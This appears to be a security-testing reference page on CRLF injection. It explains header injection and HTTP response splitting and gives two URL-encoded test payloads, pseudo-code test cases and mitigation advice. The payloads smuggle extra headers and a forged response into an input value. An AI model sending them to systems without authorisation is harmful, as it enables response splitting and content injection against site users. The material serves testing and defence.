CRLF Injection

Description

CRLF (Carriage Return Line Feed) Injection occurs when an attacker can inject CRLF characters into HTTP headers, potentially leading to HTTP response splitting, header injection, or other malicious actions.

Example with Scenario

Scenario: A web application takes user input to generate HTTP headers. An attacker can manipulate the input to inject additional headers or split the HTTP response, leading to various attacks.

Payloads and Test Cases

Payloads

1. Header Injection:

   Copy

   %0D%0AInjected-Header: injected

2. HTTP Response Splitting:

   Copy

   %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>

Test Cases

1. Header Injection:

   • Payload:

     Copy

     %0D%0AInjected-Header: injected

   • Test Case:

     Copy

     # Send payload to the server
     sendPayloadToServer("input=%0D%0AInjected-Header: injected")
     # Verify if the application includes the injected header
     checkForInjectedHeader("Injected-Header", "injected")

2. HTTP Response Splitting:

   • Payload:

     Copy

     %0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>

   • Test Case:

     Copy

     # Send payload to the server
     sendPayloadToServer("input=%0D%0AContent-Length: 0%0D%0A%0D%0AHTTP/1.1 200 OK%0D%0AContent-Type: text/html%0D%0A%0D%0A<h1>Injected Content</h1>")
     # Verify if the application splits the HTTP response
     checkForInjectedContent("<h1>Injected Content</h1>")

Mitigation

1. Input Validation:

   • Validate and sanitize user input to ensure it does not contain CRLF characters.

   • Implement strict validation rules to reject malicious input.

2. Use Libraries:

   • Use libraries and frameworks that automatically handle header encoding and prevent injection.

   • Avoid constructing HTTP headers manually using user input.

3. Secure Headers:

   • Set secure HTTP headers to mitigate the impact of potential CRLF injection.

   • Use Content Security Policy (CSP) and other security headers to protect the application.

4. Error Handling:

   • Implement proper error handling to avoid revealing header information in error messages.

   • Return generic error messages without disclosing sensitive details.